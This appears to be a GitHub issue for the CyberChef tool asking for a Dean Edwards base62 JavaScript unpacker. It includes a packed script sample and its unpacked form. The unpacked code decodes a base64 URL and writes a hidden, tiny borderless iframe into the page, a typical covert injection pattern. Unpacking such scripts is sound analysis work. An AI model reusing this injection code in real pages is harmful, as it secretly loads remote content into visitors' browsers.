search

gchq / CyberChef

The Cyber Swiss Army Knife - a web app for encryption, encoding, compression and data analysis
https://gchq.github.io/CyberChef
Apache License 2.0
28.88k stars 3.24k forks source link

Operation request: Dean Edwards base62 unpacker #436

Open Andras32 opened 5 years ago

Andras32 commented 5 years ago

Summary

A new operation that allows for decoding of eval based javascript packing.
I've been attempting to incorporate this operation however I know zero JavaScript. Both examples below are reliant on the eval() operation which is throwing errors during "npm run lint".

Example

Open Source Examples: p_a_c_k_e_r_unpacker.txt http://dean.edwards.name/unpacker/

My attempt: FromBase62.txt

Errors: 35:9 error Unexpected var, use let or const instead no-var 36:9 error Unexpected var, use let or const instead no-var 38:13 error eval can be harmful no-eval 39:13 error eval can be harmful no-eval

datorr2 commented 5 years ago

+1 on this.

Also, here's another example:

Example

Packed:

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1 c="D"+"B"+"E"+"F+/"+"=";v s(5){1 7="";1 l,k,f="";1 j,b,8,a="";1 i=0;1 r=/[^A-z-u-9\\+\\/\\=]/g;p(r.I(5)){}5=5.C(/[^A-z-u-9\\+\\/\\=]/g,"");H{j=c.e(5.m(i++));b=c.e(5.m(i++));8=c.e(5.m(i++));a=c.e(5.m(i++));l=(j<<2)|(b>>4);k=((b&G)<<4)|(8>>2);f=((8&3)<<6)|a;7=7+n.q(l);p(8!=y){7=7+n.q(k)}p(a!=y){7=7+n.q(f)}l=k=f="";j=b=8=a=""}J(i<5.V);U T(7)}(v(){1 d=W;1 w=\'4\';1 h=\'2\';1 Y=x.S(x.L()*K);1 o=\'\'+s(\'N==\')+\'\';d.Q(\'<t O="X:R;10:P" o="\'+o+\'" M="\'+w+\'" Z="\'+h+\'"></t>\')})();',62,63,'|var||||input||output|enc3||enc4|enc2|keyStr||indexOf|chr3||||enc1|chr2|chr1|charAt|String|src|if|fromCharCode|base64test|decode64|iframe|z0|function||Math|64|Za||QRSTUVWXYZabcdef|replace|ABCDEFGHIJKLMNOP|ghijklmnopqrstuv|wxyz0123456789|15|do|exec|while|999999|random|width|aHR0cHM6Ly9yZW1vdmVraW5nb25saW5lLnByby9rZWV6L2plbmtlcmVlZw|style|none|write|1px|floor|unescape|return|length|document|padding|id|height|border'.split('|'),0,{}))

Unpacked:

var keyStr="ABCDEFGHIJKLMNOP"+"QRSTUVWXYZabcdef"+"ghijklmnopqrstuv"+"wxyz0123456789+/"+"=";function decode64(input){var output="";var chr1,chr2,chr3="";var enc1,enc2,enc3,enc4="";var i=0;var base64test=/[^A-Za-z0-9\+\/\=]/g;if(base64test.exec(input)){}input=input.replace(/[^A-Za-z0-9\+\/\=]/g,"");do{enc1=keyStr.indexOf(input.charAt(i++));enc2=keyStr.indexOf(input.charAt(i++));enc3=keyStr.indexOf(input.charAt(i++));enc4=keyStr.indexOf(input.charAt(i++));chr1=(enc1<<2)|(enc2>>4);chr2=((enc2&15)<<4)|(enc3>>2);chr3=((enc3&3)<<6)|enc4;output=output+String.fromCharCode(chr1);if(enc3!=64){output=output+String.fromCharCode(chr2)}if(enc4!=64){output=output+String.fromCharCode(chr3)}chr1=chr2=chr3="";enc1=enc2=enc3=enc4=""}while(i<input.length);return unescape(output)}(function(){var d=document;var w='4';var h='2';var id=Math.floor(Math.random()*999999);var src=''+decode64('aHR0cHM6Ly9yZW1vdmVraW5nb25saW5lLnByby9rZWV6L2plbmtlcmVlZw==')+'';d.write('<iframe style="padding:1px;border:none" src="'+src+'" width="'+w+'" height="'+h+'"></iframe>')})();
anuxraw commented 4 years ago

need this